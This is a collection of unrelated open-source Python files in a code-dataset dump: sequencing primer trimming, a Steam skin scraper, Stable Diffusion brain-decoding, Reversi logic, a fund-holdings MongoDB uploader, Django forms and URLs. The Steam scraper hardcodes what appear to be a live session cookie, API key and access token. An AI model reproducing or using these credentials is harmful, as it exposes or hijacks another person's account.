FastqReader\n\n filename: Str\n The name of the stats file to be written\n\n Returns\n -------\n None\n \"\"\"\n fh = self.file_handles_[filename]\n stats = \"{name}\\t{vstats}\\t{jstats}\\t{avg_read_qual}\\n\"\n vstats = self.get_aln_stats(read, \"vgene\")\n jstats = self.get_aln_stats(read, \"jgene\")\n fh.write(\n stats.format(name=read[\"read_name\"],\n vstats=vstats,\n jstats=jstats,\n avg_read_qual=read[\"avgQual\"]\n )\n )\n\n def create_stats_handle(self, filename):\n \"\"\"\n Create a file handle for alignment stats\n\n Parameters\n ----------\n filename : Str\n The name of the stats file to be written\n\n Returns\n -------\n None\n \"\"\"\n header = \"name\\tv_gene\\tv_start\\tv_end\\tv_qStart\\tv_qEnd\\tv_score\\tv_cigar\\tv_mismatch\\tv_insertion\\tv_deletion\\tv_percent_id\\tv_alnType\\tv_primer_len\\tj_gene\\tj_start\\tj_end\\tj_qStart\\tj_qEnd\\tj_score\\tj_cigar\\tj_mismatch\\tj_insertion\\tj_deletion\\tj_percent_id\\tj_alnType\\tj_primer_len\\tavg_read_qual\\n\"\n if not filename in self.file_handles_:\n fh = open(filename, 'w')\n self.file_handles_[filename] = fh\n fh.write(header)\n fh = self.file_handles_[filename]\n return filename\n\n def trim_alignments(self, read, whichGene):\n \"\"\"\n get alignment information about a read\n\n Parameters\n ----------\n read : dict\n read record returned by FastqReader\n\n whichGene : Str\n which read \"read1\" or \"read2\"\n\n Returns\n -------\n classify : Str\n alignment classification string containing alignment information\n \"\"\"\n \n classify = \"\"\n seq = read[\"seq\"] \n start = read[whichGene][\"query_start\"]\n end = read[whichGene][\"query_end\"] \n mismatch = read[whichGene][\"mismatches\"]\n insertion = read[whichGene][\"insertions\"]\n deletion = read[whichGene][\"deletions\"] \n strand = read[whichGene][\"strand\"]\n refLen = len(self.reference[read[whichGene][\"reference_name\"]][\"seq\"])\n clipped = refLen - (end - start + 1)\n indels = insertion + deletion\n totDiff = indels + mismatch + clipped\n trimSeq = read[\"trim_seq\"]\n trimQual = read[\"trim_qual\"] \n ## check V primer alignment\n if whichGene == \"vgene\":\n if mismatch <= 2 and indels <=1 and clipped <=1 and totDiff <=3: \n trimSeq = trimSeq[end:]\n trimQual = trimQual[end:]\n classify = \"good_quality\"\n else:\n classify = \"low_quality\"\n ## check J primer alignment\n if whichGene == \"jgene\":\n if mismatch <= 2 and indels <=1 and clipped <=1 and totDiff <=3: \n classify = \"good_quality\"\n toTrim = (len(seq) - start) + 1 - 5 ## +1 for zero-based, and - 5 to leave CDR3 boundary\n trimSeq = trimSeq[:-toTrim]\n trimQual = trimQual[:-toTrim]\n else:\n classify = \"low_quality\"\n read[whichGene][\"classification\"] = classify \n read[\"trim_seq\"] = trimSeq\n read[\"trim_qual\"] = trimQual \n return read\n\n def trim_primers(self, vbam, jbam, basename):\n \"\"\"\n Identify primer alignments, trim alignments from reads\n \n Parameters\n ----------\n Vbam : string\n Read alignments against V gene primers\n Jbam : string\n Read alignments against J gene primers\n basename : string\n basename for report files\n\n Returns\n -------\n None\n \"\"\"\n #######################\n ## create file handles\n #######################\n trim_reads = self.create_fastq_handle(\"{}_trim_primers.fastq\".format(basename))\n too_short = self.create_fastq_handle(\"{}_too_short.fastq\".format(basename))\n primer_hits = self.create_stats_handle(\"{}_trim_primers.tsv\".format(basename))\n short_hits = self.create_stats_handle(\"{}_too_short.tsv\".format(basename))\n #############################\n # filter reads by alignment\n ############################# \n for read in read_two_bams(vbam, \"vgene\", jbam, \"jgene\"): \n read[\"trim_seq\"] = read[\"seq\"]\n read[\"trim_qual\"] = read[\"qual\"] \n # both V and J align\n if read[\"vgene\"] is not None and read[\"jgene\"] is not None:\n read = self.trim_alignments(read, \"vgene\")\n read = self.trim_alignments(read, \"jgene\") \n elif read[\"vgene\"] is not None and read[\"jgene\"] is None:\n read = self.trim_alignments(read, \"vgene\")\n elif read[\"vgene\"] is None and read[\"jgene\"] is not None:\n read = self.trim_alignments(read, \"jgene\")\n if len(read[\"trim_seq\"]) > 50:\n read[\"seq\"] = read[\"trim_seq\"]\n read[\"qual\"] = read[\"trim_qual\"]\n self.write_fastq(read, trim_reads)\n self.write_aln_stats(read, primer_hits)\n else:\n self.write_fastq(read, too_short)\n self.write_aln_stats(read, short_hits)\n self.close_file_handles()\n \n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"gather amplicon stats from bam file\")\n parser.add_argument(\"-p\", \"--primer_info\",\n required=True,\n help=\"primer information file\")\n parser.add_argument(\"-b\", \"--basename\",\n required=True,\n help=\"basename for output files\")\n parser.add_argument(\"-v\", \"--v_aln\",\n required=True,\n help=\"V probe alignment bam file\")\n parser.add_argument(\"-j\", \"--j_aln\",\n required=True,\n help=\"J probe alignment bam file\")\n args = parser.parse_args()\n trimmer = IPetePrimerTrimmer(args.primer_info, 14)\n trimmer.trim_primers(args.v_aln, args.j_aln, args.basename)\n\nif __name__ == '__main__': \n main()\n\n\n","repo_name":"bioinform/Daedalus","sub_path":"packages/trim-primers/trimPrimers/trimPrimers.py","file_name":"trimPrimers.py","file_ext":"py","file_size_in_byte":9403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12882327358","text":"import json\nimport requests # make http requests\n\nfrom bank.models import create_tables, insert_asset\n\ncookie = {'steamLoginSecure': '76561198070606333%7C%7CeyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0.eyAiaXNzIjogInI6MENFRV8yMjEzMUEzMF81MkI5RCIsICJzdWIiOiAiNzY1NjExOTgwNzA2MDYzMzMiLCAiYXVkIjogWyAid2ViIiBdLCAiZXhwIjogMTY4NTcyMjA2OCwgIm5iZiI6IDE2NzY5OTUzMTIsICJpYXQiOiAxNjg1NjM1MzEyLCAianRpIjogIjBEMzBfMjJBMDFFM0VfRjY2RUYiLCAib2F0IjogMTY3NjQxMzA2OSwgInJ0X2V4cCI6IDE2OTQ1OTI5MTcsICJwZXIiOiAwLCAiaXBfc3ViamVjdCI6ICIxODUuMTIxLjE3NC4xMzMiLCAiaXBfY29uZmlybWVyIjogIjE4NS4xMjEuMTc0LjEzMyIgfQ.rkTS3CYuYRakaZL7YQVm_LbP-3EP7PykOtj1JGi0B9nu8teiOAX4l0hQLs3GbU_QABxTC4jxO3ZWzIm2nOmkBQ'}\nicon_path = 'https://community.cloudflare.steamstatic.com/economy/image/'\nwebAPIKey = 'C34AF91C568BBF6D3D031292210741A3'\ntoken = 'ce4090bc6a3c4acbaf7f6d05b5eb5888'\nsteamID = '76561198070606333'\ngameID = '730'\ncount = '100'\n\n\ndef init_database():\n\t# find total number items\n\tallItemsGet = requests.get('https://steamcommunity.com/market/search/render/?search_descriptions=0&sort_column=default&sort_dir=desc&appid='+gameID+'&norender=1&count='+count, cookies=cookie) # get page\n\tallItems = allItemsGet.content; # get page content\n\tallItems = json.loads(allItems); # convert to JSON\n\t\t\n\n\tcreate_tables()\n\n\tfor result in allItems['results']:\n\t\tclassid = result['asset_description']['classid']\n\t\tinstanceid = result['asset_description']['instanceid']\n\t\ticon_url = icon_path + result['asset_description']['icon_url']\n\t\tsell_price = result['sell_price']\n\t\t\n\t\titemGet = requests.get('https://api.steampowered.com/ISteamEconomy/GetAssetClassInfo/v1/?access_token='+token+'&appid='+gameID+'&class_count=1&classid0='+classid+'&instanceid0='+instanceid)\n\t\titem = itemGet.content; # get page content\n\t\titem = json.loads(item)\n\t\t\n\t\tif(instanceid == '0'):\n\t\t\titemid = classid\n\t\telse:\n\t\t\titemid = classid + '_' + instanceid\n\t\t\n\t\tname = item['result'][itemid]['name']\t\n\t\tquality = item['result'][itemid]['descriptions']['0']['value'][10:]\n\t\t\n\t\tinsert_asset((classid), int(instanceid), name, sell_price, quality, icon_url)\n\n","repo_name":"JakeGreen85/CSGOSkins","sub_path":"CSGOSkins-master/bank/scrape_skins.py","file_name":"scrape_skins.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3255444128","text":"import h5py\nfrom PIL import Image\nimport scipy.io\nimport argparse, os\nimport pandas as pd\nimport PIL\nimport torch\nimport numpy as np\nfrom omegaconf import OmegaConf\nfrom tqdm import trange\nfrom einops import rearrange\nfrom torch import autocast\nfrom contextlib import nullcontext\nfrom pytorch_lightning import seed_everything\nimport sys\nsys.path.append(\"../utils/\")\nfrom nsd_access.nsda import NSDAccess\nfrom ldm.util import instantiate_from_config\nfrom ldm.models.diffusion.ddim import DDIMSampler\n\ndef load_model_from_config(config, ckpt, gpu, verbose=False):\n print(f\"Loading model from {ckpt}\")\n pl_sd = torch.load(ckpt, map_location=\"cpu\")\n if \"global_step\" in pl_sd:\n print(f\"Global Step: {pl_sd['global_step']}\")\n sd = pl_sd[\"state_dict\"]\n model = instantiate_from_config(config.model)\n m, u = model.load_state_dict(sd, strict=False)\n if len(m) > 0 and verbose:\n print(\"missing keys:\")\n print(m)\n if len(u) > 0 and verbose:\n print(\"unexpected keys:\")\n print(u)\n model.cuda(f\"cuda:{gpu}\")\n model.eval()\n return model\n\ndef load_img_from_arr(img_arr):\n image = Image.fromarray(img_arr).convert(\"RGB\")\n w, h = 512, 512\n image = image.resize((w, h), resample=PIL.Image.LANCZOS)\n image = np.array(image).astype(np.float32) / 255.0\n image = image[None].transpose(0, 3, 1, 2)\n image = torch.from_numpy(image)\n return 2.*image - 1.\n\ndef main():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--imgidx\",\n required=True,\n type=int,\n help=\"img idx\"\n )\n parser.add_argument(\n \"--gpu\",\n required=True,\n type=int,\n help=\"gpu\"\n )\n parser.add_argument(\n \"--seed\",\n type=int,\n default=42,\n help=\"the seed (for reproducible sampling)\",\n )\n parser.add_argument(\n \"--subject\",\n required=True,\n type=str,\n default=None,\n help=\"subject name: subj01 or subj02 or subj05 or subj07 for full-data subjects \",\n )\n parser.add_argument(\n \"--method\",\n required=True,\n type=str,\n help=\"cvpr or text or gan\",\n )\n\n # Set parameters\n opt = parser.parse_args()\n seed_everything(opt.seed)\n imgidx = opt.imgidx\n gpu = opt.gpu\n method = opt.method\n subject=opt.subject\n gandir = f'../../decoded/gan_recon_img/all_layers/{subject}/streams/'\n captdir = f'../../decoded/{subject}/captions/'\n\n # Load NSD information\n nsd_expdesign = scipy.io.loadmat('../../nsd/nsddata/experiments/nsd/nsd_expdesign.mat')\n\n # Note that mos of them are 1-base index!\n # This is why I subtract 1\n sharedix = nsd_expdesign['sharedix'] -1 \n\n nsda = NSDAccess('../../nsd/')\n sf = h5py.File(nsda.stimuli_file, 'r')\n sdataset = sf.get('imgBrick')\n\n stims_ave = np.load(f'../../mrifeat/{subject}/{subject}_stims_ave.npy')\n\n\n tr_idx = np.zeros_like(stims_ave)\n for idx, s in enumerate(stims_ave):\n if s in sharedix:\n tr_idx[idx] = 0\n else:\n tr_idx[idx] = 1\n\n # Load Stable Diffusion Model\n config = './stable-diffusion/configs/stable-diffusion/v1-inference.yaml'\n ckpt = './stable-diffusion/models/ldm/stable-diffusion-v1/sd-v1-4.ckpt'\n config = OmegaConf.load(f\"{config}\")\n torch.cuda.set_device(gpu)\n model = load_model_from_config(config, f\"{ckpt}\", gpu)\n\n n_samples = 1\n ddim_steps = 50\n ddim_eta = 0.0\n strength = 0.8\n scale = 5.0\n n_iter = 5\n precision = 'autocast'\n precision_scope = autocast if precision == \"autocast\" else nullcontext\n batch_size = n_samples\n device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\n outdir = f'../../decoded/image-{method}/{subject}/'\n os.makedirs(outdir, exist_ok=True)\n\n sample_path = os.path.join(outdir, f\"samples\")\n os.makedirs(sample_path, exist_ok=True)\n precision = 'autocast'\n device = torch.device(f\"cuda:{gpu}\") if torch.cuda.is_available() else torch.device(\"cpu\")\n model = model.to(device)\n sampler = DDIMSampler(model)\n\n sampler.make_schedule(ddim_num_steps=ddim_steps, ddim_eta=ddim_eta, verbose=False)\n\n assert 0. <= strength <= 1., 'can only work with strength in [0.0, 1.0]'\n t_enc = int(strength * ddim_steps)\n print(f\"target t_enc is {t_enc} steps\")\n\n # Load z (Image)\n imgidx_te = np.where(tr_idx==0)[0][imgidx] # Extract test image index\n idx73k= stims_ave[imgidx_te]\n Image.fromarray(np.squeeze(sdataset[idx73k,:,:,:]).astype(np.uint8)).save(\n os.path.join(sample_path, f\"{imgidx:05}_org.png\")) \n \n if method in ['cvpr','text']:\n roi_latent = 'early'\n scores_latent = np.load(f'../../decoded/{subject}/{subject}_{roi_latent}_scores_init_latent.npy')\n imgarr = torch.Tensor(scores_latent[imgidx,:].reshape(4,40,40)).unsqueeze(0).to('cuda')\n\n # Generate image from Z\n precision_scope = autocast if precision == \"autocast\" else nullcontext\n with torch.no_grad():\n with precision_scope(\"cuda\"):\n with model.ema_scope():\n x_samples = model.decode_first_stage(imgarr)\n x_samples = torch.clamp((x_samples + 1.0) / 2.0, min=0.0, max=1.0)\n\n for x_sample in x_samples:\n x_sample = 255. * rearrange(x_sample.cpu().numpy(), 'c h w -> h w c')\n im = Image.fromarray(x_sample.astype(np.uint8)).resize((512,512))\n im = np.array(im)\n\n elif method == 'gan':\n ganpath = f'{gandir}/recon_image_normalized-VGG19-fc8-{subject}-streams-{imgidx:06}.tiff'\n im = Image.open(ganpath).resize((512,512))\n im = np.array(im)\n\n init_image = load_img_from_arr(im).to('cuda')\n init_latent = model.get_first_stage_encoding(model.encode_first_stage(init_image)) # move to latent space\n\n # Load c (Semantics)\n if method == 'cvpr':\n roi_c = 'ventral'\n scores_c = np.load(f'../../decoded/{subject}/{subject}_{roi_c}_scores_c.npy')\n carr = scores_c[imgidx,:].reshape(77,768)\n c = torch.Tensor(carr).unsqueeze(0).to('cuda')\n elif method in ['text','gan']:\n captions = pd.read_csv(f'{captdir}/captions_brain.csv', sep='\\t',header=None)\n c = model.get_learned_conditioning(captions.iloc[imgidx][0]).to('cuda')\n\n # Generate image from Z (image) + C (semantics)\n base_count = 0\n with torch.no_grad():\n with precision_scope(\"cuda\"):\n with model.ema_scope():\n for n in trange(n_iter, desc=\"Sampling\"):\n uc = model.get_learned_conditioning(batch_size * [\"\"])\n\n # encode (scaled latent)\n z_enc = sampler.stochastic_encode(init_latent, torch.tensor([t_enc]*batch_size).to(device))\n # decode it\n samples = sampler.decode(z_enc, c, t_enc, unconditional_guidance_scale=scale,\n unconditional_conditioning=uc,)\n\n x_samples = model.decode_first_stage(samples)\n x_samples = torch.clamp((x_samples + 1.0) / 2.0, min=0.0, max=1.0)\n\n for x_sample in x_samples:\n x_sample = 255. * rearrange(x_sample.cpu().numpy(), 'c h w -> h w c')\n Image.fromarray(x_sample.astype(np.uint8)).save(\n os.path.join(sample_path, f\"{imgidx:05}_{base_count:03}.png\")) \n base_count += 1\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yu-takagi/StableDiffusionReconstruction","sub_path":"codes/diffusion_sd1/diffusion_decoding.py","file_name":"diffusion_decoding.py","file_ext":"py","file_size_in_byte":7540,"program_lang":"python","lang":"en","doc_type":"code","stars":1018,"dataset":"github-code","pt":"34"} +{"seq_id":"41353663873","text":"import random\nimport globalvar as gv\n\n# initialize the board to starting position\ndef initializeBoard(board):\n board[3][3], board[3][4] = gv.P2, gv.P1\n board[4][3], board[4][4] = gv.P1, gv.P2\n return board\n\n# shows the board, used for debugging purposes\ndef showBoard(board):\n for x in range(8):\n for y in range(8):\n print(board[x][y], end=' ')\n print('')\n\n# checks if the value assigned are within the index of the board\ndef isOnBoard(x, y):\n return (0<=x<=7) and (0<=y<=7)\n\n# get the amount of empty tiles available in a board\ndef getEmptyTiles(board):\n empty = 0\n\n for x in range(8):\n for y in range(8):\n if board[x][y] == '.':\n empty += 1\n\n return empty\n\n# returns opponent's pieces that can be flipped when a player place their piece in a selected position\ndef getDisksToFlip(board, turn, x_pos, y_pos):\n if board[x_pos][y_pos] != '.' or not isOnBoard(x_pos, y_pos):\n return []\n\n if (turn == gv.P1):\n enemy = gv.P2\n elif (turn == gv.P2):\n enemy = gv.P1\n\n validDisks = []\n\n for x_move, y_move in [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 1], [1, -1], [1, 0], [1, 1]]:\n x_cur, y_cur = x_pos, y_pos\n x_cur += x_move\n y_cur += y_move\n\n # check if the current tile is enemy's and in within the board\n if isOnBoard(x_cur, y_cur) and board[x_cur][y_cur] == enemy:\n x_cur += x_move\n y_cur += y_move\n\n # go back to for if the tile's coordinate is not in the board\n if not isOnBoard(x_cur, y_cur):\n continue\n\n # check if there is more enemy on the current move, done if\n while board[x_cur][y_cur] == enemy:\n x_cur += x_move\n y_cur += y_move\n\n if not isOnBoard(x_cur, y_cur):\n break\n\n if not isOnBoard(x_cur, y_cur):\n continue\n\n if board[x_cur][y_cur] == turn:\n while True:\n x_cur -= x_move\n y_cur -= y_move\n\n if x_cur == x_pos and y_cur == y_pos:\n break\n\n validDisks.append([x_cur, y_cur])\n\n return validDisks\n\n# get the valid moves in coordinates of a board\ndef getValidMoves(board, turn):\n validMoves = []\n\n for x in range(8):\n for y in range(8):\n if getDisksToFlip(board, turn, x, y) != []:\n validMoves.append([x, y])\n\n return validMoves\n\n# modify the board after a disk is placed on it\ndef makeMove(board, turn, x_pos, y_pos):\n tilesToFlip = getDisksToFlip(board, turn, x_pos, y_pos)\n\n if len(tilesToFlip) != 0:\n board[x_pos][y_pos] = turn\n for x_cur, y_cur in tilesToFlip:\n board[x_cur][y_cur] = turn\n\n return board\n\n# get the score of the pieces in a board\ndef getScore(board):\n b_score, w_score = 0, 0\n\n for x in range(8):\n for y in range(8):\n if board[x][y] == gv.P1:\n b_score += 1\n elif board[x][y] == gv.P2:\n w_score += 1\n\n return b_score, w_score\n","repo_name":"ryananggada/PyReversi","sub_path":"reversifunc.py","file_name":"reversifunc.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26067894977","text":"import datetime\nimport os\nfrom tkinter import N\nimport xml.etree.ElementTree as ET\n\nfrom dotenv import load_dotenv\nfrom pymongo import MongoClient\n\nload_dotenv()\n\nDATA_DIR = \"data\"\nCONNECTION_STRING = f\"mongodb+srv://gugge:{os.getenv('mongo_pass')}@cluster0.fxfss.mongodb.net/fundwise?retryWrites=true&w=majority\"\nCOLLECTION = \"funds\"\nDATABASE = \"myFirstDatabase\"\n\nfund_name = \"fundName\"\nholdings_date = \"holdingsDate\"\nfund_company_name = \"fundCompanyName\"\nfund_holdings = \"fundHoldings\"\ncompany_name = \"companyName\"\nshare_of_fund = \"shareOfFund\"\n\n\ndef get_period(root: ET.Element, ns: dict) -> datetime.datetime:\n report_info = root.findall(\"fund:Rapportinformation\", ns)[0]\n return datetime.datetime.strptime(\n report_info.find(\"fund:Kvartalsslut\", ns).text, \"%Y-%m-%d\"\n )\n\n\ndef get_fund_company_name(root: ET.Element, ns: dict):\n report_info = root.findall(\"fund:Bolagsinformation\", ns)[0]\n return report_info.find(\"fund:Fondbolag_namn\", ns).text\n\n\ndef get_fund_name(root: ET.Element, ns: dict):\n report_info = root.findall(\"fund:Fondinformation\", ns)[0]\n return report_info.find(\"fund:Fond_namn\", ns).text\n\n\ndef get_holdings(root: ET.Element, ns: dict):\n fund_info = root.findall(\"fund:Fondinformation\", ns)[0]\n for child in fund_info:\n if \"FinansiellaInstrument\" in child.tag:\n break\n holdings = []\n for financial_instrument in child:\n holdings.append(\n {\n company_name: financial_instrument.find(\"fund:Instrumentnamn\", ns).text,\n share_of_fund: financial_instrument.find(\n \"fund:Andel_av_fondförmögenhet_instrument\", ns\n ).text,\n }\n )\n return holdings\n\n\ndef get_files() -> list[str]:\n files = []\n for quarter_dir in os.listdir(DATA_DIR):\n quarter_fund_data = os.path.join(DATA_DIR, quarter_dir)\n if not os.path.isdir(quarter_fund_data):\n continue\n for quarter in os.listdir(quarter_fund_data):\n fund_quarter_data = os.path.join(quarter_fund_data, quarter)\n if not os.path.isdir(fund_quarter_data):\n continue\n for fund in os.listdir(fund_quarter_data):\n if not \".xml\" in fund:\n continue\n files.append(os.path.join(fund_quarter_data, fund))\n return files\n\n\ndef get_root(filepath):\n tree = ET.parse(filepath)\n root = tree.getroot()\n ns = {\"fund\": root.tag.split(\"}\")[0].replace(\"{\", \"\")}\n return root, ns\n\n\ndef insert_data(root, ns):\n date = get_period(root, ns)\n company_name = get_fund_company_name(root, ns)\n name = get_fund_name(root, ns)\n holdings = get_holdings(root, ns)\n\n fund_data_record = {\n \"$set\": {\n fund_name: name,\n holdings_date: date,\n fund_company_name: company_name,\n fund_holdings: holdings,\n }\n }\n\n client = MongoClient(CONNECTION_STRING)\n db = client[DATABASE]\n collection = db[COLLECTION]\n collection.update_one({fund_name: name, holdings_date: date}, fund_data_record, upsert=True)\n\n\nif __name__ == \"__main__\":\n files = get_files()\n for file in files:\n print(file)\n root, ns = get_root(file)\n insert_data(root, ns)\n","repo_name":"johaneg/fundwise-upload","sub_path":"fundwise_upload/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17188296356","text":"from django import forms\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, Field, Div ,Row\nfrom app.models import Sample\nimport string\nimport random\nimport os\nfrom gentelella.settings import BASE_DIR, DATA_FOLDER, MEDIA_ROOT\nfrom django.db.models import Q\nfrom django.core.mail import send_mail\n\n\ndef generate_uniq_id(size=20, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\nclass ContactForm(forms.Form):\n\n email_input=forms.EmailField(label=\"Please enter your email in case we should contact you (not required)\", required=False)\n name_input=forms.CharField(label=\"Please enter your name (not required)\",widget=forms.TextInput(attrs={'placeholder': 'Your Name'}),required=False)\n info=forms.CharField(label=\"Sample/Project info\",widget=forms.Textarea(attrs={'placeholder': 'Please include SRP/SRA ids and any extra info you deem useful for the DB'}))\n #field2= forms.CharField(label=')', required=False)\n\n ##choices go here\n def __init__(self, *args, **kwargs):\n super(ContactForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Fieldset(\n \"Is there some study/samples you would like to see included?\",\n Field('email_input',css_class='form-control'),\n Field('name_input',css_class='form-control'),\n Field('info', css_class='form-control'),\n ButtonHolder(\n # Submit('submit', 'RUN', css_class='btn btn-primary', onclick=\"alert('Neat!'); return true\")\n Submit('submit', 'SEND', css_class='btn btn-primary btn-form')\n # onsubmit=\"alert('Neat!'); return false\")\n ))\n\n )\n\n def send_email(self):\n cleaned_data = self.cleaned_data\n send_mail('liqDB: New Data from '+ cleaned_data.get(\"name_input\"), cleaned_data.get(\"info\")+\"\\nCONTACT EMAIL: \"+cleaned_data.get(\"email_input\"), 'liquiddbase@gmail.com',\n ['eaparicioeaparicio@gmail.com'], fail_silently=False)\n\n def generate_id(self):\n is_new = True\n while is_new:\n query_id = generate_uniq_id()\n #query_path =os.path.join(MEDIA_ROOT,query_id)\n query_path =os.path.join(DATA_FOLDER,\"queryData\",query_id)\n if not os.path.exists(query_path):\n os.mkdir(query_path)\n return query_id\n\n","repo_name":"sert23/liqDB","sub_path":"gentelella/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5132079593","text":"from django.contrib import admin\nfrom django.conf.urls import url\nfrom django.urls import path, include\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"NEK API\",\n default_version='v1',\n description=\"Документация для приложения NEK проекта NEK_test\",\n contact=openapi.Contact(email=\"example@example.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include('api.urls')),\n]\n\nurlpatterns += [\n url(r'^redoc/$', schema_view.with_ui('redoc', cache_timeout=0),\n name='schema-redoc'),\n]\n","repo_name":"AlexandrSharganov/nek_test","sub_path":"nek/nek/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19480380881","text":"from random import Random\nclass rtl:\n def random_str(self,randomlength=8):\n str = ''\n chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz'\n length = len(chars) - 1\n random = Random()\n for i in range(randomlength):\n str+=chars[random.randint(0, length)]\n return str","repo_name":"Mesus/Uvis","sub_path":"gim/common/randomTools.py","file_name":"randomTools.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1328099525","text":"# encoding=utf8\n\n\"\"\" The spec definitions\n Author: lipixun\n Created Time : 四 5/26 23:42:26 2016\n\n File Name: spec.py\n Description:\n\n\"\"\"\n\n# -*- ---------- The feature specs ---------- -*-\n\n# The store feature\nFEATURE_STORE_EXIST = 'store.exist' # Check if exist by id\nFEATURE_STORE_GET = 'store.get' # Get value by id / ids\nFEATURE_STORE_CREATE = 'store.create' # Create new value\nFEATURE_STORE_REPLACE = 'store.replace' # Replace value by model\nFEATURE_STORE_UPDATE = 'store.update' # Update value by id\nFEATURE_STORE_DELETE = 'store.delete' # Delete value by id\nFEATURE_STORE_COUNT = 'store.count' # Count the value\n\n# The query feature\nFEATURE_QUERY_EXIST = 'query.exist' # Check exists by query\nFEATURE_QUERY_GET = 'query.get' # Get values by query\nFEATURE_QUERY_UPDATE = 'query.update' # Update values by query\nFEATURE_QUERY_DELETE = 'query.delete' # Delete values by query\nFEATURE_QUERY_COUNT = 'query.count' # Count values by query\n\n# The high level feature\nFEATURE_WATCH = 'watch' # The watch feature\n\n# -*- ---------- The data manager event specs ---------- -*-\n\nEVENT_CREATED = 'created' # Created\nEVENT_REPLACED = 'replaced' # Replaced\nEVENT_UPDATED = 'updated' # Updated\nEVENT_DELETED = 'deleted' # Deleted\n\n# -*- ---------- The error definition ---------- -*-\n\nERROR_DUPLICATED_KEY = 0x40000001 # Duplicated key found\n","repo_name":"gavin0723/pydatahub","sub_path":"datahub/spec.py","file_name":"spec.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11910153200","text":"import disnake\nfrom disnake.ext import commands\n\nimport time\n\nfrom config import LINK\n\n\nclass ManagementCommands(commands.Cog):\n \"\"\"Handling interactions to ping or invite the bot and get server information.\"\"\"\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.slash_command()\n async def ping(self, inter: disnake.ApplicationCommandInteraction):\n \"\"\"See if The Bot is Working\"\"\"\n ping = time.time()\n await inter.send(\"Pinging...\")\n pingtime = time.time() - ping\n await inter.edit_original_message(\n content=\":ping_pong: time is `%.01f seconds`\" % pingtime)\n\n @commands.slash_command()\n async def botinvite(self,\n inter: disnake.ApplicationCommandInteraction,\n recipient: disnake.Member = None):\n \"\"\"A Link To Invite This Bot To Your Server!\"\"\"\n await inter.send(\"Check Your Dm's :wink:\")\n message = f\"Add me to Your Server: {LINK}\"\n if recipient:\n await recipient.send(message)\n else:\n await inter.author.send(message)\n\n @commands.slash_command()\n async def serverinfo(self, inter: disnake.ApplicationCommandInteraction):\n \"\"\"Displays Info About The Server!\"\"\"\n\n guild = inter.guild\n roles = [x.name for x in guild.roles]\n role_length = len(roles)\n\n # Just in case there are too many roles...\n if role_length > 50:\n roles = roles[:50]\n roles.append('>>>> Displaying[50/%s] Roles' % len(roles))\n\n roles = ', '.join(roles)\n channels = len(guild.channels)\n time = str(guild.created_at)\n time = time.split(' ')\n time = time[0]\n\n join = disnake.Embed(description='%s ' % (str(guild)),\n title='Server Info',\n colour=0xFFFF)\n # join.set_thumbnail(file = guild.icon)\n join.add_field(name='__Owner__',\n value=str(guild.owner) + '\\n' + str(guild.owner_id))\n join.add_field(name='__ID__', value=str(guild.id))\n join.add_field(name='__Member Count__', value=str(guild.member_count))\n join.add_field(name='__Text/Voice Channels__', value=str(channels))\n join.add_field(name='__Roles (%s)__' % str(role_length), value=roles)\n join.set_footer(text='Created: %s' % time)\n\n await inter.send(embed=join)\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(ManagementCommands(bot))\n","repo_name":"D-Bald/BirthdayGratulationBot","sub_path":"cogs/bot_management_commands.py","file_name":"bot_management_commands.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26557246241","text":"NETWORK = 'network'\nSUBNET = 'subnet'\nPORT = 'port'\nSECURITY_GROUP = 'security_group'\n\nCREATE = 'create'\nDELETE = 'delete'\nUPDATE = 'update'\n\nAGENT = 'q-agent-notifier'\nPLUGIN = 'q-plugin'\nDHCP = 'q-dhcp-notifer'\nLOADBALANCER_PLUGIN = 'q-loadbalancer-plugin'\n\nL3_AGENT = 'l3_agent'\nDHCP_AGENT = 'dhcp_agent'\nLOADBALANCER_AGENT = 'loadbalancer_agent'\n\n\ndef get_topic_name(prefix, table, operation):\n \"\"\"Create a topic name.\n\n The topic name needs to be synced between the agent and the\n plugin. The plugin will send a fanout message to all of the\n listening agents so that the agents in turn can perform their\n updates accordingly.\n\n :param prefix: Common prefix for the 